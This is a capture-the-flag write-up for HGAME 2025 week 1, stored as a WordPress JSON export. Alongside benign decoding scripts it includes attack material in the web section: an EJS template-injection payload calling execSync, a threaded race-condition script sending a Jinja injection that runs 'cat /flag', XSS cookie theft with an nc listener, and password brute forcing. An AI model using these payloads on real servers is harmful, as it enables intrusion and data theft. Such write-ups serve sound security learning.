{"id":10,"date":"2025-02-28T16:18:46","date_gmt":"2025-02-28T08:18:46","guid":{"rendered":"https:\/\/www.hurkin.top\/?p=10"},"modified":"2025-02-28T20:39:16","modified_gmt":"2025-02-28T12:39:16","slug":"hgame-week1_wp","status":"publish","type":"post","link":"https:\/\/www.hurkin.top\/index.php\/2025\/hgame-week1_wp\/","title":{"rendered":"HGAME-WEEK1_WP"},"content":{"rendered":"\n

-----by Hurkin<\/p>\n\n\n\n

\u7b7e\u5230<\/h2>\n\n\n\n

TEST NC<\/h3>\n\n\n\n
\"\"<\/figure>\n\n\n\n

\u4ece\u8fd9\u91cc\u5f00\u59cb\u7684\u5e8f\u7ae0\u3002<\/h3>\n\n\n\n
hgame{Now-I-kn0w-how-to-subm1t-my-fl4gs!}<\/pre>\n\n\n\n
Misc<\/h2>\n\n\n\n
Hakuya Want A Girl Friend<\/h3>\n\n\n\n
\u4e0b\u8f7d\u5f97\u5230\u4e00\u4e2atxt\u6587\u4ef6\uff0c\u91cc\u9762\u662f16\u8fdb\u5236 \u4e00\u773c\u6709zip<\/p>\n\n\n\n
\u63d0\u53d6\u51fa\u6765 \u53d1\u73b0\u91cc\u9762\u9700\u8981\u5bc6\u7801<\/p>\n\n\n\n
\u7136\u540e\u7528010\u6253\u5f00 \u53d1\u73b0\u662fpng\u53cd\u8f6c exp\uff1a<\/p>\n\n\n\n
import os\nimport binascii\ndef file_to_hex(file_path):\n  if not os.path.exists(file_path):\n\u2022    raise FileNotFoundError(f\"\u6587\u4ef6 {file_path} \u4e0d\u5b58\u5728\")\n  with open(file_path, 'rb') as f:\n\u2022    data = f.read()\n\u2022    hex_data = binascii.hexlify(data)\n\u2022    return hex_data\ndef reverse_hex(hex_str):\n  reversed_hex = ''.join([hex_str[i:i+2] for i in range(0, len(hex_str), 2)][::-1])\n  return reversed_hex\ndef process_file(input_path, output_path):\n  hex_data = file_to_hex(input_path)\n  reversed_hex = reverse_hex(hex_data.decode())\n  with open(output_path, 'wb') as f:\n\u2022    f.write(binascii.unhexlify(reversed_hex.encode()))\nif __name__ == \"__main__\":\n  input_file = 'XXXXXXXXXXXXXXXXXXXXXX\\\\a.png'  # \u8f93\u5165\u6587\u4ef6\u8def\u5f84\n  output_file = 'XXXXXXXXXXXXXXXXXXXXXX\\\\b.png'  # \u8f93\u51fa\u6587\u4ef6\u8def\u5f84\n  process_file(input_file, output_file)\n  print(f\"\u6587\u4ef6\u5df2\u6210\u529f\u5904\u7406\u5e76\u4fdd\u5b58\u5230 {output_file}\")<\/code><\/pre>\n\n\n\n
\u7136\u540e\u5f97\u5230\u5e05\u7167\uff0c\u518d\u6062\u590d\u5bbd\u9ad8\u5f97\u5230\u5bc6\u7801<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u89e3\u538b\u83b7\u5f97<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u7136\u540e\u628ahagme\u6539\u6210hgame\u5c31\u884c<\/p>\n\n\n\n
Computer cleaner<\/h3>\n\n\n\n
prat1\u3002\u5728shell.php\u91cc<\/p>\n\n\n\n
hgame{y0u_<\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u540c\u76ee\u5f55\u4e0b\u6709ip\u5730\u5740121.41.34.25<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u8bbf\u95ee\u5f97<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
hav3_cleaned_th3<\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u6700\u540e\u4e00\u90e8\u5206<\/p>\n\n\n\n
_c0mput3r!}<\/pre>\n\n\n\n
\u6240\u4ee5 flag\u662f<\/p>\n\n\n\n
hgame{y0u_hav3_cleaned_th3_c0mput3r!}<\/p>\n\n\n\n
Level 314 \u7ebf\u6027\u8d70\u5eca\u4e2d\u7684\u53cc\u751f\u5b9e\u4f53<\/h3>\n\n\n\n
linear1 \u5c42\u5bf9\u8f93\u5165\u5f20\u91cf\u8fdb\u884c\u7ebf\u6027\u53d8\u6362<\/p>\n\n\n\n
security\u5c42\uff1a<\/p>\n\n\n\n
    \n
  1. \u5982\u679c\u8f93\u5165\u5f20\u91cf\u7684\u5747\u503c\u63a5\u8fd10.31415\uff0c\u5219\u89e3\u7801\u5e76\u6253\u5370\u9690\u85cf\u7684flag\u3002<\/li>\n\n\n\n
  2. \u5982\u679c\u8f93\u5165\u5f20\u91cf\u7684\u5747\u503c\u5927\u4e8e0.5\uff0c\u5219\u89e3\u7801\u5e76\u6253\u5370\u865a\u5047\u7684flag<\/li>\n<\/ol>\n\n\n\n
    relu\u5c42\u5bf9\u8f93\u5165\u5f20\u91cf\u5e94\u7528ReLU\u6fc0\u6d3b\u51fd\u6570<\/p>\n\n\n\n
    linear2 \u5c42\u662f\u4e00\u4e2a\u6807\u51c6\u7684\u7ebf\u6027\u53d8\u6362\u5c42<\/p>\n\n\n\n
    import torch
    from torch import optim
    from io import StringIO
    import sys
    # \u52a0\u8f7d\u9884\u8bad\u7ec3\u6a21\u578b
    model = torch.jit.load('Model.pt')
    # \u8bbe\u5b9a\u76ee\u6807\u5747\u503c
    desired_mean = 0.31415
    # \u521d\u59cb\u5316\u8f93\u5165\u5f20\u91cf
    batch_size = 1
    input_dim = 10
    input_data = torch.full((batch_size, input_dim), 0.0, requires_grad=True)
    # \u914d\u7f6e\u4f18\u5316\u5668
    optimizer = optim.Adam([input_data], lr=0.01)
    # \u5b9a\u4e49\u635f\u5931\u51fd\u6570
    def compute_loss(output_mean):
        return (output_mean - desired_mean) ** 2
    # \u6267\u884c\u4f18\u5316\u8fc7\u7a0b
    max_iterations = 1000
    for iteration in range(max_iterations):
        optimizer.zero_grad()
        # \u524d\u5411\u4f20\u64ad
        linear_output = model.linear1(input_data)
        current_mean = torch.mean(linear_output)
        # \u8ba1\u7b97\u635f\u5931
        loss = compute_loss(current_mean)
        # \u53cd\u5411\u4f20\u64ad\u4e0e\u4f18\u5316
        loss.backward()
        optimizer.step()
        # \u6253\u5370\u4e2d\u95f4\u7ed3\u679c
        if iteration % 100 == 0:
            print(f\"Iteration {iteration}: Current mean = {current_mean.item()}, Loss = {loss.item()}\")
    # \u8f93\u51fa\u6700\u7ec8\u7ed3\u679c
    print(f\"Final input mean: {torch.mean(input_data).item()}\")
    print(f\"Post-linear1 mean: {torch.mean(model.linear1(input_data)).item()}\")
    # \u91cd\u5b9a\u5411\u6807\u51c6\u8f93\u51fa\u4ee5\u6355\u83b7print\u8f93\u51fa
    original_stdout = sys.stdout
    sys.stdout = captured_stdout = StringIO()
    # \u8fd0\u884c\u5b8c\u6574\u6a21\u578b
    final_output = model(input_data)
    # \u6062\u590d\u6807\u51c6\u8f93\u51fa
    sys.stdout = original_stdout
    # \u68c0\u67e5\u5e76\u6253\u5370\u6355\u83b7\u7684\u8f93\u51fa
    output_log = captured_stdout.getvalue()
    if \"Hidden:\" in output_log:
        print(\"Found the real flag:\")
        print(output_log)
    else:
        print(\"Failed to find the real flag.\")<\/code><\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    RE<\/h2>\n\n\n\n
    Compress dot new<\/h3>\n\n\n\n
    \u5148\u89e3\u6790 Huffman \u6811<\/p>\n\n\n\n
    enc.txt<\/code> \u7684\u7b2c\u4e00\u90e8\u5206\u662f Huffman \u6811\u7684 JSON \u8868\u793a\u3002\u6211\u4eec\u9700\u8981\u89e3\u6790\u8fd9\u4e2a JSON \u5e76\u91cd\u5efa Huffman \u6811\u3002<\/p>\n\n\n\n
    \u518d\u89e3\u7801\u4e8c\u8fdb\u5236\u6570\u636e<\/p>\n\n\n\n
    \u7b2c\u4e8c\u90e8\u5206\u662f\u4f7f\u7528 Huffman \u7f16\u7801\u540e\u7684\u4e8c\u8fdb\u5236\u6570\u636e\u3002\u6211\u4eec\u9700\u8981\u6839\u636e Huffman \u6811\u5c06\u8fd9\u4e9b\u4e8c\u8fdb\u5236\u6570\u636e\u89e3\u7801\u56de\u539f\u59cb\u5b57\u7b26\u3002<\/p>\n\n\n\n
    \u6700\u540e\u91cd\u5efa\u539f\u59cb\u6587\u672c<\/p>\n\n\n\n
    \u5c06\u89e3\u7801\u540e\u7684\u5b57\u7b26\u6309\u987a\u5e8f\u6392\u5217\uff0c\u5f97\u5230 flag.txt<\/code> \u7684\u539f\u59cb\u5185\u5bb9\u3002<\/p>\n\n\n\n
    exp\uff1a<\/p>\n\n\n\n
    import json
    # \u89e3\u6790 Huffman \u6811
    def parse_huffman_tree(node, code='', code_dict=None):
        if code_dict is None:
            code_dict = {}
        if 's' in node:
            code_dict[node['s']] = code
        else:
            if 'a' in node:
                parse_huffman_tree(node['a'], code + '0', code_dict)
            if 'b' in node:
                parse_huffman_tree(node['b'], code + '1', code_dict)
        return code_dict
    # \u89e3\u7801\u4e8c\u8fdb\u5236\u6570\u636e
    def decode_binary_data(binary_data, code_dict):
        reverse_code_dict = {v: k for k, v in code_dict.items()}
        current_code = ''
        decoded_text = ''
        for bit in binary_data:
            current_code += bit
            if current_code in reverse_code_dict:
                decoded_text += chr(reverse_code_dict[current_code])
                current_code = ''
        return decoded_text
    # \u8bfb\u53d6 enc.txt
    with open('D:\\\\AAAHurkin\\\\Code\\\\CTF\\\\\u6bd4\u8d5b\\\\2025\\\\HGAME\\\\WEEK1\\\\Compress dot new\\\\enc.txt', 'r') as file:
        data = file.read().split('\\n')
        huffman_tree_json = data[0]
        binary_data = data[1]
    # \u89e3\u6790 Huffman \u6811
    huffman_tree = json.loads(huffman_tree_json)
    code_dict = parse_huffman_tree(huffman_tree)
    # \u89e3\u7801\u4e8c\u8fdb\u5236\u6570\u636e
    decoded_text = decode_binary_data(binary_data, code_dict)
    # \u8f93\u51fa\u89e3\u7801\u540e\u7684\u6587\u672c
    print(decoded_text)<\/code><\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Turtle<\/h3>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \u76f4\u63a5\u8131\u58f3\uff0c\u8131IDA\u5206\u6790\uff0c\u5176\u4e2dKEY\u662fRC4\u52a0\u5bc6\uff0cflag\u662f\u7528key\u52a0\u5bc6<\/p>\n\n\n\n
    exp:<\/p>\n\n\n\n
    def rc4(key, data):
        # \u521d\u59cb\u5316S\u76d2
    \u200b    S = list(range(256))
    \u200b    j = 0
        # KSA\u9636\u6bb5
    \u200b    for i in range(256):
    \u200b        j = (j + S[i] + key[i % len(key)]) % 256
    \u200b        S[i], S[j] = S[j], S[i]
        # PRGA\u9636\u6bb5\u751f\u6210\u5bc6\u94a5\u6d41
    \u200b    i = j = 0
    \u200b    keystream = []
    \u200b    for _ in range(len(data)):
    \u200b        i = (i + 1) % 256
    \u200b        j = (j + S[i]) % 256
    \u200b        S[i], S[j] = S[j], S[i]
    \u200b        k = S[(S[i] + S[j]) % 256]
    \u200b        keystream.append(k)
        # \u5f02\u6216\u89e3\u5bc6
    \u200b    return bytes([data[x] ^ keystream[x] for x in range(len(data))])
    # \u89e3\u5bc6Key
    encrypted_key = bytes([0xCD, 0x8F, 0x25, 0x3D, 0xE1, 0x51, 0x4A])
    key_seed = b'yekyek'
    decrypted_key = rc4(key_seed, encrypted_key)
    print(\"Key:\", decrypted_key.decode())
    # \u89e3\u5bc6Flag
    v5_encrypted = bytes([
        0xF8, 0xD5, 0x62, 0xCF, 0x43, 0xBA, 0xC2, 0x23,
        0x15, 0x4A, 0x51, 0x10, 0x27, 0x10, 0xB1, 0xCF,
        0xC4, 0x09, 0xFE, 0xE3, 0x9F, 0x49, 0x87, 0xEA,
        0x59, 0xC2, 0x07, 0x3B, 0xA9, 0x11, 0xC1, 0xBC,
        0xFD, 0x4B, 0x57, 0xC4, 0x7E, 0xD0, 0xAA, 0x0A
    ])
    flag = rc4(decrypted_key, v5_encrypted)
    print(\"Flag:\", flag.decode('utf-8', errors='ignore'))<\/code><\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    WEB<\/h2>\n\n\n\n
    Level 24 Pacman<\/h3>\n\n\n\n
    \u7528\u9f20\u6807\u6253\u5f00\uff0c\u53bb\u7f8e\u5316\u4e00\u4e0bhttps:\/\/obf-io.deobfuscate.io\/<\/a><\/p>\n\n\n\n
    \u5bf9js\u8fdb\u884c\u5206\u6790<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \u5e94\u8be5\u662f\u4e0a\u9762\u7684base64\u5bf9\u5e94\u5230\u8fbe\u4e00\u4e07\u5206\u5f97\u5230\u7684aGFldTRlcGNhXzR0cmdte19yX2Ftbm1zZX0=<\/p>\n\n\n\n
    \uff08\u5176\u5b9e\u63a7\u5236\u53f0\u6539\u5206\u6570\u4e5f\u884c\"image-20250203212711024\"<\/p>\n\n\n\n
    \u6700\u540e\u5f97\u5230<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    haeu4epca_4trgm{_r_amnmse}<\/pre>\n\n\n\n
    Level 47 BandBomb<\/h3>\n\n\n\n
    \u8fd9\u4e2a\u7f51\u9875\u662f\u57fa\u4e8evue\u7684\uff0c\u6240\u4ee5\u4e0d\u8003\u8651php\u9a6c<\/p>\n\n\n\n
    app.post('\/rename', (req, res) => {
     const { oldName, newName } = req.body;
     const oldPath = path.join(__dirname, 'uploads', oldName);
     const newPath = path.join(__dirname, 'uploads', newName);
     if (!oldName || !newName) {
      return res.status(400).json({ error: ' ' });
     }
     fs.rename(oldPath, newPath, (err) => {
      if (err) {
       return res.status(500).json({ error: ' ' + err.message });
      }
      res.json({ message: ' ' });
     });
    });<\/code><\/pre>\n\n\n\n
    \/rename\u63a5\u53e3\u53ef\u4ee5\u6539\u540d\uff0c\u7528POSTMAN\u4f20JSON\uff0c\u8986\u76d6ejs\u6253\u6a21\u677f\u9a6c<\/p>\n\n\n\n
    \u8bd5\u4e86\u4e00\u4e0b\uff0c\u4e0d\u5728\u76ee\u5f55\u4e0b\uff0c\u5c31\u60f3\u5230\u73af\u5883\u53d8\u91cf\u3002<\/p>\n\n\n\n
    exp:<\/p>\n\n\n\n
    <%- process.mainModule.require('child_process').execSync('env') %><\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \u5237\u65b0\u4e00\u4e0b\u7f51\u9875\uff0c\u7136\u540e\u5c31\u663e\u793a\u51faflag<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Level 69 MysteryMessageBoard<\/h3>\n\n\n\n
    \u5148\u5f31\u5bc6\u7801\u7206\u7834\uff0c\u5f97\u5230\u5bc6\u7801888888<\/p>\n\n\n\n
    \u7136\u540e\u662fxss\uff0c\u5728\u7528nc\u76d1\u542c<\/p>\n\n\n\n
    exp\uff1a<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    session=MTczODgyMzkzNXxEWDhFQVFMX2dBQUJFQUVRQUFBbl80QUFBUVp6ZEhKcGJtY01DZ0FJZFhObGNtNWhiV1VHYzNSeWFXNW5EQWNBQldGa2JXbHV8CVCTE94XqyZtucHRBJG8ctXbXWl5GynvfM6RcnYa-EI=<\/p>\n\n\n\n
    \u5728\u7528bp\u4f2a\u9020admin\u8bbf\u95ee\/flag<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Level 25 \u53cc\u9762\u4eba\u6d3e\u5bf9<\/h3>\n\n\n\n
    \u5148upx\u8131\u58f3<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \u7528ida\u6253\u5f00\uff0c\u662f\u4e00\u4e2amc\u6876\u670d\u52a1<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \u7136\u540e\u8fde\u63a5\uff0c<\/p>\n\n\n\n
    \n
    \n
    mc alias set myminio http:\/\/node1.hgame.vidar.club:30516 minio_admin JPSQ4NOBvh2\/W7hzdLyRYLDm0wNRMG48BL09yOKGpHs=<\/pre>\n<\/div>\n<\/div>\n\n\n\n
    \u67e5\u770b\u76ee\u5f55<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \u628ahints\u4e0b\u7684scr.zip\u63d0\u53d6\u51fa\u6765<\/p>\n\n\n\n
    \u662f\u4e00\u4e2ago\u8def\u7531\uff0c\u7136\u540e\u6dfb\u52a0rce\u9a6c\u8bbf\u95ee\u8def\u7531\u5373\u53ef\"image-20250208215457764\"<\/p>\n\n\n\n
    flag{y0u_s4ld_r1ghT-BUt-YoU-SH0uID-plAy-geNsHIN_imP4Ct0}<\/pre>\n\n\n\n
    Level 38475 \u89d2\u843d<\/h3>\n\n\n\n
    \u5148\u6253robots.txt<\/p>\n\n\n\n
    \u53d1\u73b0\/app.conf<\/p>\n\n\n\n
    \n
    \n
    RewriteEngine On
    RewriteCond \"%{HTTP_USER_AGENT}\" \"^L1nk\/\"
    RewriteRule \"^\/admin\/(.*)$\" \"\/$1.html?secret=todo\"<\/pre>\n<\/div>\n<\/div>\n\n\n\n
    \u5e94\u8be5\u662fRewrite\u7684CVE<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \u7136\u540e\u53bb\u8bfb\u53d6\u6e90\u7801\uff0c\u53d1\u73b0\u662f\u5ef6\u65f6\u68c0\u67e5\u9ed1\u540d\u5355\uff0c\u5f88\u7ecf\u5178\u7684\u6761\u4ef6\u7ade\u4e89<\/p>\n\n\n\n
    exp:<\/p>\n\n\n\n
    import threading
    import requests
    Path = \"http:\/\/node1.hgame.vidar.club:32490\"
    def send():
      while True:
    \u200b    requests.post(f\"{Path}\/app\/send\", data={\"message\": \"\"\"{{[].__class__.__base__.__subclasses__()[140].__init__['__glo'+'bals__']['__builtins__']['eval'](\"__import__('os').popen('cat \/flag').read()\")}}\"\"\"})
    def read():
      while True:
    \u200b    print(requests.get(f\"{Path}\/app\/read\").text)
    \\# \u521b\u5efa\u548c\u542f\u52a850\u4e2a\u53d1\u9001\u7ebf\u7a0b\u548c150\u4e2a\u8bfb\u53d6\u7ebf\u7a0b
    threads = []
    for _ in range(50):
      tosend = threading.Thread(target=send)
      toget = threading.Thread(target=read)
      threads.append(tosend)
      threads.append(toget)
      tosend.start()
      toget.start()<\/code><\/pre>\n\n\n\n
    \u5f97\u5230flag<\/p>\n\n\n\n
    hgame{YOu-f1Nd_TH3_kEy_TO-Rrr4C3-oUuuUt22e0754}<\/pre>\n","protected":false},"excerpt":{"rendered":"
    —–by Hurkin \u7b7e\u5230 TEST NC \u4ece\u8fd9\u91cc\u5f00\u59cb\u7684\u5e8f\u7ae0\u3002 hgame{Now-I-kn0w-how-to-subm1 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-10","post","type-post","status-publish","format-standard","hentry","category-some-competition"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/10","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/comments?post=10"}],"version-history":[{"count":6,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/10\/revisions"}],"predecessor-version":[{"id":55,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/10\/revisions\/55"}],"wp:attachment":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/media?parent=10"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/categories?post=10"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/tags?post=10"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}